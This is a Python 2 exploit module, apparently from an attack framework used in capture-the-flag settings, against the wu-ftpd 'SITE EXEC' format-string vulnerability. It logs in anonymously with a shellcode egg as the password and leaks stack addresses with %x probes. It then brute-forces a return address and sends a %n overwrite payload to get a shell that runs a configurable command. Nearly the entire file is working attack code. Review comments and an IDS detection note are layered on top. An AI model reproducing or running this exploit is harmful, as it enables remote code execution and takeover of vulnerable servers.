def set_up(self):
    """Attach an EggManager built from the module-level shellcode to self.eggm.

    Stray top-level copy of the FTPFormatString.set_up method defined below;
    it is not attached to any class at this position.
    """
    manager = EggManager(shellcode, 390)
    self.eggm = manager
class FTPFormatString(Exploit):
    """Exploit module for the wu-ftpd ``SITE EXEC`` format-string bug.

    Sequence implemented in :meth:`execute`: anonymous FTP login with the
    egg passed as the password, two ``SITE EXEC`` probes whose replies are
    parsed for hex values, a bounded search loop, one final ``SITE EXEC``
    line, a fixed wait, then ``CMD`` is written on the raw socket and one
    line of output is kept in ``self.res``.

    Python 2 only: relies on ``long``, ``string.index`` and ``string.join``.

    Detection note: every ``SITE EXEC`` line this class sends is made up
    almost entirely of printf specifiers, so FTP command logging or an IDS
    rule on ``SITE EXEC`` followed by ``%`` flags it reliably.

    Framework parameters registered in ``__init__``:
        RESULT: substring expected in the captured output on success.
        CMD:    command line sent after the final payload.
    """

    # Upper bound on probes in the return-address search loop in execute().
    MAX_ITERATION = 50

    def __init__(self):
        # `desc` is not defined in this class; presumably a module-level
        # string — TODO confirm.
        Exploit.__init__(self,'Wuftpd format string', desc)
        # These are later read back as self.RESULT and self.CMD; presumably
        # the Exploit base class sets those attributes from the registered
        # params — verify against the framework.
        self.add_param(StringParam('RESULT','well done','The string that must be present in the result if the attack is successful'))
        self.add_param(StringParam('CMD','cat /flag.txt', 'The command to be executed on the remote host'))
        self.eggm = None   # created by set_up()
        self.res = ''      # last output line captured by execute()

    def set_up(self):
        # Must run before execute(): otherwise self.eggm is still None and
        # execute() fails at self.eggm.get_egg() with an AttributeError.
        self.eggm = EggManager(shellcode,390)
        pass

    def execute(self):
        """Run the attack against the service and store one output line in self.res.

        Raises:
            ServiceDown: the FTP connection could not be opened.
            ExploitError: the USER command failed, or a login reply did not
                contain '331' / '230'.
            ValueError: (unhandled) a reply lacked the '|', '+' or newline
                marker that string.index expects.

        Returns None without raising when the search loop exhausts
        MAX_ITERATION; self.res is left as '' in that case.

        NOTE(review): ftpm is never closed or quit in this method; whether
        FTPManager releases the socket itself is not visible here.
        """
        # self.eggm is expected from set_up(); it is not created here.
        self.res = ""
        ftpm = ftp.FTPManager()
        # Explicit `== False` test: a None return from connect() would fall
        # through as success — TODO confirm FTPManager.connect's contract.
        if ftpm.connect()==False:
            raise ServiceDown()
        self.log.info("Sending login...")
        if (ftpm.send_cmd('user anonymous')==False):
            raise ExploitError('Connection error')
        self.log.debug('Banner: %s'%ftpm.welcome)
        resp = ftpm.get_ftp_response()
        self.log.debug('Received: %s'%resp)
        # Substring test over the whole reply text, not a status-code parse.
        if ('331' in resp)==False:
            raise ExploitError('Unable to log-in')
        # The egg travels in the PASS argument.
        egg = self.eggm.get_egg()
        passwd = ftp.FTPCommand('pass',[egg])
        ftpm.send_cmd(passwd)
        resp = ftpm.get_ftp_response()
        self.log.debug('Received: %s'%resp)
        if ('230' in resp)==False:
            raise ExploitError('Unable to log-in')
        self.log.info("Logged in (the egg is inside)")
        # First probe: the reply is split on '+' and '|' and two hex values
        # are parsed out of it. string.index raises ValueError (not
        # ExploitError) if a marker is missing.
        ftpm.send_cmd("SITE EXEC exec %x %x %x %x +%x |%x")
        reply = ftpm.get_ftp_response()
        self.log.debug('Received: %s'%reply)
        temp1 = string.index(reply,"|")
        temp2 = string.index(reply,"+")
        reta = long(reply[temp1+1:string.index(reply,"\n")],16)
        retz = long(reply[temp2+1:temp1],16)
        # Second probe: 89 specifiers then a '|' marker; one hex value parsed.
        params = []
        for i in range(89):
            params.append("%x")
        params.append("|%x")
        ftpm.send_cmd(ftp.FTPCommand("site exec",params))
        reply = ftpm.get_ftp_response()
        retb = long(reply[string.index(reply,"|")+1 : string.index(reply,"\n")],16)
        # `add` selects which of two fixed offset sets is used below.
        add = 0
        if reta == 0:
            reta = retz
        else:
            add = 600
        # NOTE(review): 0x58, 100, 0x2569, 600, 9807 and 480 are fixed,
        # build-specific adjustments; their derivation is not recorded
        # anywhere in this file.
        reta = reta - 0x58
        retb = retb +100 -0x2569 - add;
        self.log.debug(" reta = %x\r\n retz = %x\r\n retb = %x"%(reta,retz,retb))
        self.log.info(" Finding return address....")
        # Search loop: counter runs from 22 up to 22 + MAX_ITERATION - 1.
        # `st` is assigned on success but never read anywhere.
        counter = 22
        st = 0
        while(counter<22+self.MAX_ITERATION):
            # reta is emitted little-endian, one byte per %c.
            params = ["kkkkkkkkkkkkkkkkkkkkkkkkkkbbbb%c%c\xff%c%c"%\
                (reta & 0xff,\
                (reta & 0xff00) >> 8,\
                (reta & 0xff0000) >> 16,\
                (reta & 0xff000000) >> 24)]
            for i in range(129):
                params.append("%f")
            for i in range(counter+1):
                params.append("%d")
            params.append("|%x|%x")
            ftpm.send_cmd("SITE EXEC "+string.join(params,""))
            reply = ftpm.get_ftp_response()
            # The value between the two '|' markers is compared with reta.
            temp1 = string.index(reply,"|")
            temp2 = string.index(reply,"|",temp1+1)
            val = long(reply[temp1+1 : temp2],16)
            self.log.debug(" address = %x (I'm looking for %x)"%(val,reta))
            if (val != 0):
                if (val == reta):
                    st = 1
                    break
            counter = counter+1
        # Exhaustion is detected by the counter value, not by `st`.
        if counter==22+self.MAX_ITERATION:
            self.log.warning("Attack failed. I cannot find the return address")
            return
        self.log.debug("Return address found after %d iterations"%(counter-22+1))
        # Final line: same prefix as the probe, but "%.f" instead of "%f",
        # `counter` (not counter+1) "%d" entries, and a width that depends
        # on the `add` branch taken above.
        params = ["kkkkkkkkkkkkkkkkkkkkkkkkkkbbbb%c%c\xff%c%c"%\
            (reta & 0xff,\
            (reta & 0xff00) >> 8,\
            (reta & 0xff0000) >> 16,\
            (reta & 0xff000000) >> 24)]
        for i in range(129):
            params.append("%.f")
        for i in range(counter):
            params.append("%d")
        if(add == 600):
            params.append("|%%.%ud%%n"%(retb+9807))
        else:
            params.append("|%%.%ud%%n"%(retb+9807-480))
        ftpm.send_cmd("SITE EXEC "+string.join(params,""))
        self.log.info("Waiting for a shell....")
        # Fixed wait; nothing checks that the service is still responsive
        # before CMD is written to the raw socket.
        time.sleep(2)
        self.log.info("Sending command")
        ftpm.send_raw(self.CMD+"\n")
        # The first line read back is only logged; the second is the result.
        temp = ftpm.sock.readline('\n',blocking=True)
        self.log.debug('Received: %s'%temp)
        self.res = ftpm.sock.readline('\n',blocking=True)
        self.log.debug("Result %r"%self.res)

    def isSuccessful(self):
        # Plain substring match. An empty RESULT matches even an empty
        # self.res, so an execute() that returned early would still be
        # reported as RES_OK in that configuration.
        if self.RESULT in self.res:
            return exploit.RES_OK
        else:
            return exploit.RES_FAIL